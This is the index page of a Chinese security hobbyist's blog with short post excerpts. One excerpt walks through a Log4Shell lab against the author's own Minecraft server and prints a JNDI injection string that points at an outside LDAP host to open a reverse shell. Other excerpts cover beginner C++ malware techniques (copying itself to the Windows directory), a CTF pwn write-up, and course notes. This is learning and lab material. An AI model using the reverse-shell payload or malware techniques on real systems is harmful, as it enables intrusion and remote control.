Joe1sn's Cabin

Created2021-12-12|CVE

log4j 还是1day的时候，对minecraft服务器进行漏洞调试环境搭建在服务器上搭建了mc服务端，这个照着网上的教程做的这里用的不是官方包，而是这个：https://www.joe1sn.top/server.jar java版本是 openjdk version "1.8.0_162"OpenJDK Runtime Environment (build 1.8.0_162-8u162-b12-1-b12)OpenJDK 64-Bit Server VM (build 25.162-b12, mixed mode) 特意换的老版本开始攻击这里使用了https://github.com/feihong-cs/JNDIExploit这个工具在本地搭建ngrok代理本地的监听端口然后生成利用EXP ${jndi:ldap://150.158.75.102:1389/Basic/ReverseShell/3.133.207.110/13605} 登陆服务器在聊天框中输入回车等待后getshell 但是服务器会崩...

【免杀】C++恶意软件入门笔记

Created2021-03-30|program

C++恶意软件入门笔记，高中看的一本书，大二小小实践一下简单的Windows API 复制自身到Windows目录 1-1.获得程序自生API DWORD GetModuleFileName 1-2.获得windows目录 UINT GetWindowsDirectory 1-3.拷贝文件 BOOL CopyFile 获得系统基本参数 2-1.获得操作系统版本 BOOL GetVersionEx typedef struct _OSVERSIONINFOA { DWORD dwOSVersionInfoSize; DWORD dwMajorVersion; DWORD dwMinorVersion; DWORD dwBuildNumber; DWORD dwPlatformId; CHAR szCSDVersion[128]; // Maintenance string for PSS usage } OS...

BUUCTF Pwn WriteUp

Created2021-03-14|writeup

buu部分刷题记录 [HarekazeCTF2019]baby_rop 1.checksec() Arch: amd64-64-littleRELRO: Partial RELROStack: No canary foundNX: NX enabledPIE: No PIE (0x400000) 2.IDA main int __cdecl main(int argc, const char **argv, const char **envp){ char v4; // [rsp+0h] [rbp-10h] system("echo -n \"What's your name? \""); __isoc99_scanf("%s", &v4); printf("Welcome to the Pwn World, %s!\n", &v4); return 0;} scanf的溢出，注意，要溢出的栈+...

计算机系统安全-板书

Created1990-09-26

硬件安全第一节课第二节课 PUF：https://www.puftech.com/index.do?introduce